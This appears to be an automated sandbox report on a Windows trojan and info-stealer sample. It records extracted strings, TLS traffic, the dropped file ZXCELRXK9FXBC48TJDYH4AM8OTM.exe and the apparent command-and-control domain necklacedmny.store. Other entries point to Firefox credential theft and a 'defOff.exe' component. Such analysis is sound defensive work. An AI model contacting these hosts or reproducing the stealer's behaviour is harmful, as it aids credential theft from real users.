Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2242781558.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2363459732.0000000000C53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.2277317516.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/T
Source: file.exe, 00000000.00000002.2363227484.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2355875043.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356474234.0000000000C65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/apiO
Source: file.exe, 00000000.00000003.2277317516.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2303633690.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/d
Source: file.exe, 00000000.00000003.2356210334.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2363459732.0000000000C53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store/l
Source: file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2197768429.000000000520F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197927264.00000000051F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2226103653.000000000520E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2226103653.000000000520E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2226199144.0000000005507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2226542376.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49763 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name:
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Code function: 4_2_00FAC000	4_2_00FAC000
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Code function: 4_2_00E4589A	4_2_00E4589A
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Code function: 4_2_00E3DAE6	4_2_00E3DAE6
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Code function: 4_2_00FAFFE0	4_2_00FAFFE0

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00C5AE2F appears 36 times

Source: file.exe, 00000000.00000003.2348097024.00000000058CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2355755681.00000000052E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2351592479.0000000005684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2351984781.0000000005686000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2353811251.000000000568A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2355875043.0000000000C58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2339423519.0000000005755000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343327387.0000000005785000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2349201001.00000000057B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335740445.0000000005685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2340837996.000000000576F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335646440.00000000054E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337101424.0000000005734000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336105810.0000000005685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2352168913.00000000057D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350114450.000000000568A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343070536.0000000005787000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2349792949.0000000005685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2339092177.0000000005756000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2341784884.000000000584E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337001350.000000000568E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2340530763.000000000576C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335936399.0000000005689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2339741342.0000000005760000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342654376.000000000577C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350909186.0000000005687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336019401.000000000572D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2338003016.000000000568C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2349628928.00000000057BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2344022192.000000000589D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343763411.0000000005686000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2338299324.0000000005688000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336641800.0000000005739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2347752349.00000000057AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337385858.000000000573E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342793800.0000000005881000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337290096.0000000005689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335843535.00000000054E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2355663552.0000000005243000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2338147072.0000000005744000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2338467598.0000000005747000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2345384837.0000000005797000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337580195.0000000005689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336548348.000000000568A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337772542.0000000005745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2338688624.0000000005808000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2341035365.0000000005861000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2349950413.00000000057B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2345529344.00000000058AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2341458083.0000000005684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335545370.000000000568C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2334270718.000000000531C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336370641.000000000572C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2345073360.0000000005687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2348578159.000000000568B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2340662821.000000000568B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336720455.0000000005685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2341326555.0000000005770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336280894.0000000005686000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2349463079.000000000568A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342503831.0000000005689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342378118.0000000005880000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2344162726.0000000005682000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342933352.000000000568C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337479626.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2347283931.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2339580989.0000000005683000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2351068636.00000000057CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336816364.0000000005722000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2346174137.000000000568E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2335304985.00000000054EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2347056010.000000000568E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2346553011.00000000057AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2356102182.00000000052B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2339267786.0000000005690000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2356708414.000000000593D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350414178.0000000005684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2340389939.000000000568D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2340255933.0000000005765000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343623135.0000000005788000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343904068.000000000578C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2353631979.0000000005941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2340077736.0000000005690000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2341181309.0000000005685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2352707158.0000000005682000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350579943.00000000057B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343479436.0000000005682000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2347531632.0000000005687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2338928273.0000000005689000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336459855.00000000057CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2352303230.0000000005919000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2351765851.00000000057C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2343209593.000000000568C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342010962.0000000005688000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2356210334.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2341617055.0000000005762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2351242997.0000000005687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2337196516.00000000057EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2344588018.0000000005795000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2353016971.00000000057E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350747038.00000000058EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2351413700.00000000057C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336190921.0000000005724000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2350277481.00000000057B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2339903247.0000000005841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336908891.00000000057CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2342236675.0000000005781000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9979060540752351

Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@5/2

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2197304349.0000000005214000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211654713.000000000520D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211772910.0000000005203000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	ReversingLabs: Detection: 39%
Source: file.exe	Virustotal: Detection: 48%

Source: file.exe	String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signatur
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeQ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe "C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe "C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
